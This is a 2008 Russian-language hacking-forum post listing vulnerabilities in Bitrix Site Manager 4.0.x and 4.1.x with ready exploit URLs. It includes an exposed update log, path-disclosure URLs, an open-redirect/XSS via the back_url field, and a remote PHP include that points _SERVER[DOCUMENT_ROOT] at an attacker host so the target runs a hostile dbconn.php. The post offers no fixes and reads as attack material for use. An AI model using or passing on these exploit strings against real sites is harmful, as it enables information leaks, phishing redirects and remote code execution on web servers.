22.01.2008, 03:22
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
Уязвимости в Bitrix CMS
Multiple Vulns in Bitrix CMS
Версия системы и история обновления
Vulnerable: Bitrix Site Manager 4.1.x
Exploit:
Код:
http://www.bitrix.ru/bitrix/updates/updater.log
XSS в редиректе:
Уязвимость присутствует из-за редиректа в форме авторизации во время POST- запроса. Атакующий может подменить значение скрытого поля back_url и перенаправить жертву на вредоносную страницу.
Раскрытие пути
Vulnerable: Bitrix Site Manager 4.0.x
Exploit:
Код:
http://host/bitrix/templates/.default/subscribe/subscr_form.php
http://host /bitrix/php_interface/dbquery_error.php
PHP Include
Vulnerable: Bitrix Site Manager 4.0.x
Exploit:
Код:
http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/
"http://attackhost/" должен содержать скрипт dbconn.php в /bitrix/php_interface/
|
|
|